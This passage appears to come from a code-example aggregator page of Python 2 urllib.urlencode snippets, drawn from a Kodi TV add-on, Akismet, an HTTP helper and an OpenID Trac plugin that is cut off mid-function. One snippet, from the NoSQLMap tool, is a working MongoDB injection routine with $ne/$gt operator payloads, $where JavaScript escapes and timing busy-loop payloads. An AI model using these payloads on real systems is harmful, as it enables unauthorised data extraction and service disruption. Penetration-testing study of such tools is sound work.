			addStream("foshanxinwen", "佛山新闻综合")
			addStream("guangzhouxinwen", "广州新闻")
			addStream("guangzhoujingji", "广州经济")
			addStream("guangzhoushaoer", "广州少儿")
			addStream("guangzhouzonghe", "广州综合")
			addStream("guangzhouyingyu", "广州英语")
			addStream("shaoguanzonghe", "韶关综合")
			addStream("shaoguangonggong", "韶关公共")
			addStream("shenzhencjsh", "深圳财经")
			addStream("zhuhaiyitao", "珠海一套")
			addStream("zhuhaiertao", "珠海二套")
		if city == "sichuan":
			addStream("cdtv1", "成都新闻综合")
			addStream("cdtv2new", "成都经济资讯服务")
			addStream("cdtv5", "成都公共")
		if city == "liaoning":
			addStream("daliannews", "大连一套")
			addStream("liaoningds", "辽宁都市")
		if city == "jiangxi":
			addStream("ganzhou", "赣州新闻综合")
			addStream("nanchangnews", "南昌新闻")
		if city == "hubei":
			addStream("hubeidst", "湖北电视台综合频道")
			addStream("hubeigonggong", "湖北公共")
			addStream("hubeijiaoyu", "湖北教育")
			addStream("hubeitiyu", "湖北体育")
			addStream("hubeiyingshi", "湖北影视")
			addStream("hubeijingshi", "湖北经视")
			addStream("hubeigouwu", "湖北购物")
			addStream("jznews", "荆州新闻频道")
			addStream("wuhanetv", "武汉教育")
			addStream("jzlongs", "湖北垄上频道")
			addStream("xiangyangtai", "襄阳广播电视台")
		if city == "heilongjiang":
			addStream("haerbinnews", "哈尔滨新闻综合")
		if city == "xinjiang":
			addStream("xjtv2", "维语新闻综合")
			addStream("xjtv3", "哈语新闻综合")
			addStream("xjtv5", "维语综艺")
			addStream("xjtv8", "哈语综艺")
			addStream("xjtv9", "维语经济生活")
		if city == "hebei":
			addStream("hebeinongmin", "河北农民频道")
			addStream("hebeijingji", "河北经济")
			addStream("shijiazhuangyitao", "石家庄一套")
			addStream("shijiazhuangertao", "石家庄二套")
			addStream("shijiazhuangsantao", "石家庄三套")
			addStream("shijiazhuangsitao", "石家庄四套")
			addStream("xingtaizonghe", "邢台综合")
			addStream("xingtaishenghuo", "邢台生活")
			addStream("xingtaigonggong", "邢台公共")
			addStream("xingtaishahe", "邢台沙河")
		if city == "shandong":
			addStream("jinannews", "济南新闻")
			addStream("qingdaonews", "青岛新闻综合")
			addStream("yantaixinwenzonghe", "烟台新闻综合")
			addStream("yantaixinjingjishenghuo", "烟台经济生活")
			addStream("yantaigonggong", "烟台公共频道")
		if city == "gansu":
			addStream("jingcailanzhou", "睛彩兰州")
		if city == "yunnan":
			addStream("lijiangnews", "丽江新闻综合频道")
			addStream("lijiangpublic", "丽江公共频道")
		if city == "neimenggu":
			addStream("neimenggu2", "蒙语频道")
			addStream("neimengwh", "内蒙古文化频道")
		if city == "jiangsu":
			addStream("nanjingnews", "南京新闻")
			addStream("nantongxinwen", "南通新闻频道")
			addStream("nantongshejiao", "南通社教频道")
			addStream("nantongshenghuo", "南通生活频道")
			addStream("wuxixinwenzonghe", "无锡新闻综合")
			addStream("wuxidoushizixun", "无锡都市资讯")
			addStream("wuxiyuele", "无锡娱乐")
			addStream("wuxijingji", "无锡经济")
			addStream("wuxiyidong", "无锡移动")
			addStream("wuxishenghuo", "无锡生活")
		if city == "zhejiang":
			addStream("nbtv1", "宁波一套")
			addStream("nbtv2", "宁波二套")
			addStream("nbtv3", "宁波三套")
			addStream("nbtv4", "宁波四套")
			addStream("nbtv5", "宁波五套")
		if city == "shanghai":
			addStream("shnews", "上海新闻综合")
		if city == "fujian":
			addStream("xiamen1", "厦门一套")
			addStream("xiamen2", "厦门二套")
			addStream("xiamen3", "厦门三套")
			addStream("xiamen4", "厦门四套")
			addStream("xiamenyidong", "厦门移动")
		if city == "shaanxi":
			addStream("xiannews", "西安新闻")
		if city == "xizang":
			addStream("xizang2", "藏语频道")
		if city == "jilin":
			addStream("yanbianguangbo", "延边卫视视频广播")
			addStream("yanbianam", "延边卫视AM")
			addStream("yanbianfm", "延边卫视FM")
		
		xbmcplugin.endOfDirectory(addon_handle)

	elif param.startswith("?category="):
		category = param[10:]
		
		def addStream(channelID, channelName):
			li = xbmcgui.ListItem(channelName, iconImage=addon_path + "/resources/media/" + channelID + ".png")
			xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?stream=" + channelID, listitem=li)
		
		if category == "yangshi":
			addStream("cctv1", "CCTV-1 综合")
			addStream("cctv2", "CCTV-2 财经")
			addStream("cctv3", "CCTV-3 综艺")
			addStream("cctv4", "CCTV-4 (亚洲)")
			addStream("cctveurope", "CCTV-4 (欧洲)")
			addStream("cctvamerica", "CCTV-4 (美洲)")
			addStream("cctv5", "CCTV-5 体育")
			addStream("cctv6", "CCTV-6 电影")
			addStream("cctv7", "CCTV-7 军事 农业")
			addStream("cctv8", "CCTV-8 电视剧")
			addStream("cctvjilu", "CCTV-9 纪录")
			addStream("cctvdoc", "CCTV-9 纪录(英)")
			addStream("cctv10", "CCTV-10 科教")
			addStream("cctv11", "CCTV-11 戏曲")
			addStream("cctv12", "CCTV-12 社会与法")
			addStream("cctv13", "CCTV-13 新闻")
			addStream("cctvchild", "CCTV-14 少儿")
			addStream("cctv15", "CCTV-15 音乐")
			addStream("cctv9", "CCTV-NEWS")
			addStream("cctv5plus", "CCTV体育赛事")
		if category == "weishi":
			addStream("anhui", "安徽卫视")
			addStream("btv1", "北京卫视")
			addStream("bingtuan", "兵团卫视")
			addStream("chongqing", "重庆卫视")
			addStream("dongfang", "东方卫视")
			addStream("dongnan", "东南卫视")
			addStream("gansu", "甘肃卫视")
			addStream("guangdong", "广东卫视")
			addStream("guangxi", "广西卫视")
			addStream("guizhou", "贵州卫视")
			addStream("hebei", "河北卫视")
			addStream("henan", "河南卫视")
			addStream("heilongjiang", "黑龙江卫视")
			addStream("hubei", "湖北卫视")
			addStream("jilin", "吉林卫视")
			addStream("jiangxi", "江西卫视")
			addStream("kangba", "康巴卫视")
			addStream("liaoning", "辽宁卫视")
			addStream("travel", "旅游卫视")
			addStream("neimenggu", "内蒙古卫视")
			addStream("ningxia", "宁夏卫视")
			addStream("qinghai", "青海卫视")
			addStream("shandong", "山东卫视")
			addStream("sdetv", "山东教育台")
			addStream("shenzhen", "深圳卫视")
			addStream("shan1xi", "山西卫视")
			addStream("shan3xi", "陕西卫视")
			addStream("shenzhen", "深圳卫视")
			addStream("sichuan", "四川卫视")
			addStream("tianjin", "天津卫视")
			addStream("xizang", "西藏卫视")
			addStream("xiamen", "厦门卫视")
			addStream("xianggangweishi", "香港卫视")
			addStream("xinjiang", "新疆卫视")
			addStream("yanbian", "延边卫视")
			addStream("yunnan", "云南卫视")
			addStream("zhejiang", "浙江卫视")
		
		if category == "shuzi":
			addStream("zhongxuesheng", "CCTV中学生")
			addStream("xinkedongman", "CCTV新科动漫")
			addStream("zhinan", "CCTV电视指南")
		
		if category == "chengshi":
			def addCity(cityID, cityName):
				li = xbmcgui.ListItem(cityName, iconImage=addon_path + "/resources/media/" + cityID + ".png")
				xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?city=" + cityID, listitem=li, isFolder=True)
			
			addCity("anhui", "Anhui 安徽")
			addCity("beijing", "Beijing 北京")
			addCity("fujian", "Fujian 福建")
			addCity("gansu", "Gansu 甘肃")
			addCity("guangdong", "Guangdong 广东")
			addCity("guangxi", "Guangxi 广西")
			addCity("hebei", "Hebei 河北")
			addCity("heilongjiang", "Heilongjiang 黑龙江")
			addCity("hubei", "Hubei 湖北")
			addCity("jilin", "Jilin 吉林")
			addCity("jiangsu", "Jiangsu 江苏")
			addCity("jiangxi", "Jiangxi 江西")
			addCity("liaoning", "Liaoning 辽宁")
			addCity("neimenggu", "Inner Mongolia 内蒙古")
			addCity("shandong", "Shandong 山东")
			addCity("shaanxi", "Shaanxi 陕西")
			addCity("shanghai", "Shanghai 上海")
			addCity("sichuan", "Sichuan 四川")
			addCity("tianjin", "Tianjin 天津")
			addCity("xizang", "Tibet 西藏")
			addCity("xinjiang", "Xinjiang 新疆")
			addCity("yunnan", "Yunnan 云南")
			addCity("zhejiang", "Zhejiang 浙江")
		
		xbmcplugin.endOfDirectory(addon_handle)
		
	else:
		def addCategory(categoryID, categoryName):
			li = xbmcgui.ListItem(categoryName)
			xbmcplugin.addDirectoryItem(handle=addon_handle, url=sys.argv[0] + "?category=" + categoryID, listitem=li, isFolder=True)
		
		addCategory("yangshi", "National Channels 央视频道")
		addCategory("weishi", "Provincial Channels 卫视频道")
		addCategory("shuzi", "Digital Channels 数字频道")
		addCategory("chengshi", "City-based Channels 城市频道")
		
		xbmcplugin.endOfDirectory(addon_handle)
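
A side note on the directory items above: the plugin URLs are assembled by plain string concatenation ("?stream=" + channelID). A minimal sketch, not taken from the add-on itself, of how urllib.urlencode could build the same query strings while also percent-escaping any reserved characters (the base URL below is a made-up example):

import urllib

def build_plugin_url(base_url, **query):
    # In a Kodi add-on, base_url would typically be sys.argv[0].
    # urlencode percent-escapes each key and value and joins the pairs with '&'.
    return base_url + "?" + urllib.urlencode(query)

# build_plugin_url("plugin://plugin.video.example/", stream="cctv1")
# -> "plugin://plugin.video.example/?stream=cctv1"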

Example 43

Project: NoSQLMap
Source File: nsmweb.py
View license
def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
    print "Web App Attacks (POST)"
    print "==============="
    paramName = []
    paramValue = []
    global vulnAddrs
    global httpMethod
    httpMethod = "POST"
    vulnAddrs = []
    global possAddrs
    possAddrs = []
    timeVulnsStr = []
    timeVulnsInt = []
    appUp = False
    strTbAttack = False
    intTbAttack = False
    trueStr = False
    trueInt = False
    global neDict
    global gtDict
    testNum = 1

    #Verify app is working.
    print "Checking to see if site at " + str(victim) + ":" + str(webPort) + str(uri) + " is up..."

    if https == "OFF":
        appURL = "http://" + str(victim) + ":" + str(webPort) + str(uri)

    elif https == "ON":
        appURL = "https://" + str(victim) + ":" + str(webPort) + str(uri)

    try:
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        appRespCode = urllib2.urlopen(req).getcode()

        if appRespCode == 200:

            normLength = int(len(urllib2.urlopen(req).read()))
            timeReq = urllib2.urlopen(req)
            start = time.time()
            page = timeReq.read()
            end = time.time()
            timeReq.close()
            timeBase = round((end - start), 3)

            if verb == "ON":
                print "App is up! Got response length of " + str(normLength) + " and response time of " + str(timeBase) + " seconds.  Starting injection test.\n"

            else:
                print "App is up!"
            appUp = True
        else:
            print "Got " + str(appRespCode) + "from the app, check your options."

    except Exception,e:
        print e
        print "Looks like the server didn't respond.  Check your options."

    if appUp == True:

        menuItem = 1
        print "List of parameters:"
        for params in postData.keys():
            print str(menuItem) + "-" + params
            menuItem += 1

        try:
            injIndex = raw_input("Which parameter should we inject? ")
            injOpt = str(postData.keys()[int(injIndex)-1])
            print "Injecting the " + injOpt + " parameter..."
        except:
            raw_input("Something went wrong.  Press enter to return to the main menu...")
            return

        injectSize = raw_input("Baseline test-Enter random string size: ")
        injectString = randInjString(int(injectSize))
        print "Using " + injectString + " for injection testing.\n"

        #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
        #Add error handling for Non-200 HTTP response codes if random strings freak out the app.
        postData.update({injOpt:injectString})
        if verb == "ON":
            print "Checking random injected parameter HTTP response size sending " + str(postData) +"...\n"

        else:
            print "Sending random parameter value..."

        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        randLength = int(len(urllib2.urlopen(req).read()))
        print "Got response length of " + str(randLength) + "."

        randNormDelta = abs(normLength - randLength)

        if randNormDelta == 0:
            print "No change in response size injecting a random parameter..\n"
        else:
            print "Random value variance: " + str(randNormDelta) + "\n"

        #Generate not equals injection
        neDict = postData
        neDict[injOpt + "[$ne]"] = neDict[injOpt]
        del neDict[injOpt]
        body = urllib.urlencode(neDict)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo PHP not equals associative array injection using " + str(postData) +"..."

        else:
            print "Test 1: PHP/ExpressJS != associative array injection"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum +=1
        print "\n"

        #Delete the extra key
        del postData[injOpt + "[$ne]"]

        #generate $gt injection
        gtDict = postData
        gtDict.update({injOpt:""})
        gtDict[injOpt + "[$gt]"] = gtDict[injOpt]
        del gtDict[injOpt]
        body = urllib.urlencode(gtDict)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing PHP/ExpressJS >Undefined Injection using " + str(postData) + "..."

        else:
            print "Test 2:  PHP/ExpressJS > Undefined Injection"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        postData.update({injOpt:"a'; return db.a.find(); var dummy='!"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where all Javascript string escape attack for all records...\n"
            print "Injecting " + str(postData)

        else:
            print "Test 3: $where injection (string escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1
        else:
            testNum += 1

        print "\n"

        postData.update({injOpt:"1; return db.a.find(); var dummy=1"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where Javascript integer escape attack for all records...\n"
            print "Injecting " + str(postData)
        else:
            print "Test 4: $where injection (integer escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1
        else:
            testNum += 1
        print "\n"

        #Start a single record attack in case the app expects only one record back
        postData.update({injOpt:"a'; return db.a.findOne(); var dummy='!"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where all Javascript string escape attack for one record...\n"
            print " Injecting " + str(postData)

        else:
            print "Test 5: $where injection string escape (single record)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum += 1
        print "\n"

        postData.update({injOpt:"1; return db.a.findOne(); var dummy=1"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)
        if verb == "ON":
            print "Testing Mongo <2.4 $where Javascript integer escape attack for one record...\n"
            print " Injecting " + str(postData)

        else:
            print "Test 6: $where injection integer escape (single record)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum += 1
        print "\n"

        postData.update({injOpt:"a'; return this.a != '" + injectString + "'; var dummy='!"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)

        if verb == "ON":
            print "Testing Mongo this not equals string escape attack for all records..."
            print " Injecting " + str(postData)

        else:
            print "Test 7: This != injection (string escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1
            print "\n"
        else:
            testNum += 1

        postData.update({injOpt:"1; return this.a != '" + injectString + "'; var dummy=1"})
        body = urllib.urlencode(postData)
        req = urllib2.Request(appURL,body, requestHeaders)

        if verb == "ON":
            print "Testing Mongo this not equals integer escape attack for all records..."
            print " Injecting " + str(postData)
        else:
            print "Test 8:  This != injection (integer escape)"

        errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)

        if errorCheck == False:
            injLen = int(len(urllib2.urlopen(req).read()))
            checkResult(randLength,injLen,testNum,verb,postData)
            testNum += 1

        else:
            testNum += 1
        print "\n"

        doTimeAttack = raw_input("Start timing based tests (y/n)? ")

        if doTimeAttack == "y" or doTimeAttack == "Y":
            print "Starting Javascript string escape time based injection..."
            postData.update({injOpt:"a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(curDate.getTime()-date.getTime()))/1000 < 10); return true; var dummy='a"})
            body = urllib.urlencode(postData)
            conn = urllib2.urlopen(req,body)
            start = time.time()
            page = conn.read()
            end = time.time()
            conn.close()
            print str(end)
            print str(start)
            strTimeDelta = (int(round((end - start), 3)) - timeBase)
            #print str(strTimeDelta)
            if strTimeDelta > 25:
                print "HTTP load time variance was " + str(strTimeDelta) +"  seconds! Injection possible."
                strTbAttack = True

            else:
                print "HTTP load time variance was only " + str(strTimeDelta) + " seconds.  Injection probably didn't work."
                strTbAttack = False

            print "Starting Javascript integer escape time based injection..."

            postData.update({injOpt:"1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1"})
            body = urllib.urlencode(postData)
            start = time.time()
            conn = urllib2.urlopen(req,body)
            page = conn.read()
            end = time.time()
            conn.close()
            print str(end)
            print str(start)
            intTimeDelta = ((end-start) - timeBase)
            #print str(strTimeDelta)
            if intTimeDelta > 25:
                print "HTTP load time variance was " + str(intTimeDelta) +" seconds! Injection possible."
                intTbAttack = True

            else:
                print "HTTP load time variance was only " + str(intTimeDelta) + " seconds.  Injection probably didn't work."
                intTbAttack = False

        print "\n"
        print "Exploitable requests:"
        print "\n".join(vulnAddrs)
        print "\n"
        print "Possibly vulnerable requests:"
        print"\n".join(possAddrs)
        print "\n"
        print "Timing based attacks:"

        if strTbAttack == True:
            print "String attack-Successful"
        else:
            print "String attack-Unsuccessful"
        if intTbAttack == True:
            print "Integer attack-Successful"
        else:
            print "Integer attack-Unsuccessful"

        fileOut = raw_input("Save results to file (y/n)? ")

        if fileOut.lower() == "y":
            savePath = raw_input("Enter output file name: ")
            fo = open(savePath, "wb")
            fo.write ("Vulnerable Requests:\n")
            fo.write("\n".join(vulnAddrs))
            fo.write("\n\n")
            fo.write("Possibly Vulnerable Requests:\n")
            fo.write("\n".join(possAddrs))
            fo.write("\n")
            fo.write("Timing based attacks:\n")

            if strTbAttack == True:
                fo.write("String Attack-Successful\n")
            else:
                fo.write("String Attack-Unsuccessful\n")
            fo.write("\n")

            if intTbAttack == True:
                fo.write("Integer attack-Successful\n")
            else:
                fo.write("Integer attack-Unsuccessful\n")
            fo.write("\n")
            fo.close()

    raw_input("Press enter to continue...")
    return()
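
The routine above keeps mutating the postData dict (for example renaming a key to param + "[$ne]") and re-serialising it with urllib.urlencode before each request. A small standalone sketch, with made-up parameter names and values, of what that serialisation produces:

import urllib

postData = {"username": "admin", "password": "x"}
# mimic the $ne key rename performed above
postData["password[$ne]"] = postData.pop("password")
body = urllib.urlencode(postData)
# e.g. 'username=admin&password%5B%24ne%5D=x'  (pair order may vary; dicts are unordered)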

Example 44

Project: tendenci
Source File: akismet.py
View license
    def comment_check(self, comment, data=None, build_data=True, DEBUG=False):
        """
        This is the function that checks comments.
        
        It returns ``True`` for spam and ``False`` for ham.
        
        If you set ``DEBUG=True`` then it will return the text of the response,
        instead of the ``True`` or ``False`` object.
        
        It raises ``APIKeyError`` if you have not yet set an API key.
        
        If the connection to Akismet fails then the ``HTTPError`` or
        ``URLError`` will be propagated.
        
        As a minimum it requires the body of the comment. This is the
        ``comment`` argument.
        
        Akismet requires some other arguments, and allows some optional ones.
        The more information you give it, the more likely it is to be able to
        make an accurate diagnosis.
        
        You supply these values using a mapping object (dictionary) as the
        ``data`` argument.
        
        If ``build_data`` is ``True`` (the default), then *akismet.py* will
        attempt to fill in as much information as possible, using default
        values where necessary. This is particularly useful for programs
        running in a CGI environment. A lot of useful information
        can be supplied from environment variables (``os.environ``). See below.
        
        You *only* need to supply values for which you don't want defaults
        filled in. All values must be strings.
        
        There are a few required values. If they are not supplied, and
        defaults can't be worked out, then an ``AkismetError`` is raised.
        
        If you set ``build_data=False`` and a required value is missing an
        ``AkismetError`` will also be raised.
        
        The normal values (and defaults) are as follows : ::
        
            'user_ip':          os.environ['REMOTE_ADDR']       (*)
            'user_agent':       os.environ['HTTP_USER_AGENT']   (*)
            'referrer':         os.environ.get('HTTP_REFERER', 'unknown') [#]_
            'permalink':        ''
            'comment_type':     'comment' [#]_
            'comment_author':   ''
            'comment_author_email': ''
            'comment_author_url': ''
            'SERVER_ADDR':      os.environ.get('SERVER_ADDR', '')
            'SERVER_ADMIN':     os.environ.get('SERVER_ADMIN', '')
            'SERVER_NAME':      os.environ.get('SERVER_NAME', '')
            'SERVER_PORT':      os.environ.get('SERVER_PORT', '')
            'SERVER_SIGNATURE': os.environ.get('SERVER_SIGNATURE', '')
            'SERVER_SOFTWARE':  os.environ.get('SERVER_SOFTWARE', '')
            'HTTP_ACCEPT':      os.environ.get('HTTP_ACCEPT', '')
        
        (*) Required values
        
        You may supply as many additional 'HTTP_*' type values as you wish.
        These should correspond to the http headers sent with the request.
        
        .. [#] Note the spelling "referrer". This is a required value by the
            akismet api - however, referrer information is not always
            supplied by the browser or server. In fact the HTTP protocol
            forbids relying on referrer information for functionality in 
            programs.
        .. [#] The `API docs <http://akismet.com/development/api/>`_ state that this value
            can be " *blank, comment, trackback, pingback, or a made up value*
            *like 'registration'* ".
        """
        if self.key is None:
            raise APIKeyError("Your have not set an API key.")
        if data is None:
            data = {}
        if build_data:
            self._build_data(comment, data)
        if 'blog' not in data:
            data['blog'] = self.blog_url
        url = '%scomment-check' % self._getURL()
        # we *don't* trap the error here
        # so if akismet is down it will raise an HTTPError or URLError
        headers = {'User-Agent' : self.user_agent}
        resp = self._safeRequest(url, urlencode(data), headers)
        if DEBUG:
            return resp
        resp = resp.lower()
        if resp == 'true':
            return True
        elif resp == 'false':
            return False
        else:
            # NOTE: Happens when you get a 'howdy wilbur' response !
            raise AkismetError('missing required argument.')
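
For context, a minimal usage sketch of this checker. It assumes the surrounding class is the usual Akismet class from akismet.py, with a constructor like Akismet(key=..., blog_url=...) and a verify_key() helper; the key, URLs and comment below are placeholders:

from akismet import Akismet

api = Akismet(key='YOUR_API_KEY', blog_url='http://example.com/')
if api.verify_key():
    is_spam = api.comment_check(
        'Buy cheap watches!!!',
        data={'user_ip': '203.0.113.7', 'user_agent': 'Mozilla/5.0'})
    # build_data=True (the default) fills in the remaining fields with the
    # defaults listed in the docstring before the dict is urlencoded and POSTed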

Example 45

Project: traktforalfred
Source File: web.py
View license
def request(method, url, params=None, data=None, headers=None, cookies=None,
            files=None, auth=None, timeout=60, allow_redirects=False):
    """Initiate an HTTP(S) request. Returns :class:`Response` object.

    :param method: 'GET' or 'POST'
    :type method: ``unicode``
    :param url: URL to open
    :type url: ``unicode``
    :param params: mapping of URL parameters
    :type params: :class:`dict`
    :param data: mapping of form data ``{'field_name': 'value'}`` or
        :class:`str`
    :type data: :class:`dict` or :class:`str`
    :param headers: HTTP headers
    :type headers: :class:`dict`
    :param cookies: cookies to send to server
    :type cookies: :class:`dict`
    :param files: files to upload (see below).
    :type files: :class:`dict`
    :param auth: username, password
    :type auth: ``tuple``
    :param timeout: connection timeout limit in seconds
    :type timeout: ``int``
    :param allow_redirects: follow redirections
    :type allow_redirects: ``Boolean``
    :returns: :class:`Response` object


    The ``files`` argument is a dictionary::

        {'fieldname' : { 'filename': 'blah.txt',
                         'content': '<binary data>',
                         'mimetype': 'text/plain'}
        }

    * ``fieldname`` is the name of the field in the HTML form.
    * ``mimetype`` is optional. If not provided, :mod:`mimetypes` will
      be used to guess the mimetype, or ``application/octet-stream``
      will be used.

    """

    # TODO: cookies
    # TODO: any way to force GET or POST?
    socket.setdefaulttimeout(timeout)

    # Default handlers
    openers = []

    if not allow_redirects:
        openers.append(NoRedirectHandler())

    if auth is not None:  # Add authorisation handler
        username, password = auth
        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, url, username, password)
        auth_manager = urllib2.HTTPBasicAuthHandler(password_manager)
        openers.append(auth_manager)

    # Install our custom chain of openers
    opener = urllib2.build_opener(*openers)
    urllib2.install_opener(opener)

    if not headers:
        headers = CaseInsensitiveDictionary()
    else:
        headers = CaseInsensitiveDictionary(headers)

    if 'user-agent' not in headers:
        headers['user-agent'] = USER_AGENT

    # Accept gzip-encoded content
    encodings = [s.strip() for s in
                 headers.get('accept-encoding', '').split(',')]
    if 'gzip' not in encodings:
        encodings.append('gzip')

    headers['accept-encoding'] = ', '.join(encodings)

    if files:
        if not data:
            data = {}
        new_headers, data = encode_multipart_formdata(data, files)
        headers.update(new_headers)
    elif data and isinstance(data, dict):
        data = urllib.urlencode(str_dict(data))

    # Make sure everything is encoded text
    headers = str_dict(headers)

    if isinstance(url, unicode):
        url = url.encode('utf-8')

    if params:  # GET args (POST args are handled in encode_multipart_formdata)

        scheme, netloc, path, query, fragment = urlparse.urlsplit(url)

        if query:  # Combine query string and `params`
            url_params = urlparse.parse_qs(query)
            # `params` take precedence over URL query string
            url_params.update(params)
            params = url_params

        query = urllib.urlencode(str_dict(params), doseq=True)
        url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))

    req = urllib2.Request(url, data, headers)
    return Response(req)
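
The params branch above merges the URL's existing query string with the params mapping before re-encoding it. A standalone sketch of that step with a made-up URL; doseq=True emits one key=value pair per element when a value is a list:

import urllib
import urlparse

url = 'http://example.com/search?q=old&page=1'
params = {'q': 'new'}                        # caller params take precedence

scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
merged = urlparse.parse_qs(query)            # {'q': ['old'], 'page': ['1']}
merged.update(params)                        # {'q': 'new', 'page': ['1']}
query = urllib.urlencode(merged, doseq=True)
print urlparse.urlunsplit((scheme, netloc, path, query, fragment))
# e.g. http://example.com/search?q=new&page=1  (parameter order may differ)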

Example 46

Project: authopenid-plugin
Source File: authopenid.py
View license
    def _do_process(self, req):
        """Handle the redirect from the OpenID server.
        """
        db = self.env.get_db_cnx()
        oidconsumer, oidsession = self._get_consumer(req, db)

        # Ask the library to check the response that the server sent
        # us.  Status is a code indicating the response type. info is
        # either None or a string containing more information about
        # the return type.
        current_url = req.abs_href(req.path_info)
        info = oidconsumer.complete(req.args,current_url)

        css_class = 'error'
        if info.status == consumer.FAILURE and info.identity_url:
            # In the case of failure, if info is non-None, it is the
            # URL that we were verifying. We include it in the error
            # message to help the user figure out what happened.
            fmt = "Verification of %s failed: %s"
            message = fmt % (cgi.escape(info.identity_url),
                             info.message)
        elif info.status == consumer.SUCCESS:
            # Success means that the transaction completed without
            # error. If info is None, it means that the user cancelled
            # the verification.
            css_class = 'alert'

            session_attr = {}           # attributes for new "user"

            # This is a successful verification attempt. If this
            # was a real application, we would do our login,
            # comment posting, etc. here.
            fmt = "You have successfully verified %s as your identity."
            message = fmt % (cgi.escape(info.identity_url),)
            remote_user = info.identity_url

            sreg_info = sreg.SRegResponse.fromSuccessResponse(info) or {}

            ax_response = ax.FetchResponse.fromSuccessResponse(info)
            ax_info = {}
            if ax_response:
                for alias, uri in self.openid_ax_attrs.items():
                    values = ax_response.data.get(uri,[])
                    if values:
                        ax_info[alias] = values[0]

            email = (ax_info.get('email')
                     or ax_info.get('email2')
                     or sreg_info.get('email'))

            fullname = (
                ' '.join(filter(None, map(ax_info.get,
                                          ('firstname', 'lastname'))))
                or sreg_info.get('fullname')
                or (email and email.split('@',1)[0].replace('.', ' ').title()))

            nickname = sreg_info.get('nickname')

            if self.groups_to_request and TeamsResponse:
                teams_response = TeamsResponse.fromSuccessResponse(info)
                if teams_response:
                    # be careful not to make user a member of any trac groups
                    # not named in groups_to_request
                    teams = set(teams_response.teams
                                ).intersection(self.groups_to_request)
                    if teams:
                        session_attr['openid.teams'] = ','.join(teams)

            if self.strip_protocol:
                remote_user = remote_user[remote_user.find('://')+3:]
            if self.strip_trailing_slash and remote_user[-1] == '/':
                remote_user = remote_user[:-1]
            if info.endpoint.canonicalID:
                # You should authorize i-name users by their canonicalID,
                # rather than their more human-friendly identifiers.  That
                # way their account with you is not compromised if their
                # i-name registration expires and is bought by someone else.
                message += ("  This is an i-name, and its persistent ID is %s"
                            % (cgi.escape(info.endpoint.canonicalID),))
                remote_user = info.endpoint.canonicalID

            allowed = True
            if self.re_white_list:
                self.env.log.debug("Filtering REMOTE_USER '%s' through white-list." % remote_user)
                allowed = False
                for item in self.re_white_list:
                    if not allowed and item.match(remote_user):
                        allowed = True
                        self.env.log.debug("User white-listed.")
            if allowed and self.re_black_list:
                self.env.log.debug("Filtering REMOTE_USER '%s' through black-list." % remote_user)
                for item in self.re_black_list:
                    if item.match(remote_user):
                        allowed = False
                        self.env.log.debug("User black-listed.")
            if allowed and self.re_email_white_list:
                self.env.log.debug("Filtering email %r through email white-list." % email)
                allowed = False
                if email:
                    for item in self.re_email_white_list:
                        if not allowed and item.match(email):
                            allowed = True
                            self.env.log.debug("User email white-listed.")

            if allowed and self.check_list:
                allowed = False
                params = {self.check_list_key: remote_user}
                if email:
                    params['email'] = email
                url = self.check_list + '?' + urllib.urlencode(params)
                self.env.log.debug('OpenID check list URL: %s' % url)
                try:
                    result = json.load(urllib.urlopen(url))
                    if result[self.check_list_key]:
                        if self.check_list_username:
                            cl_username = unicode(
                                result[self.check_list_username])
                            if not cl_username:
                                raise ValueError("Bad value for username")
                        allowed = True
                except Exception, ex:
                    self.env.log.error('OpenID check_list failed: %s' % ex)

            if allowed:
                cookie = hex_entropy()
                cookie_lifetime = self.trac_auth_cookie_lifetime

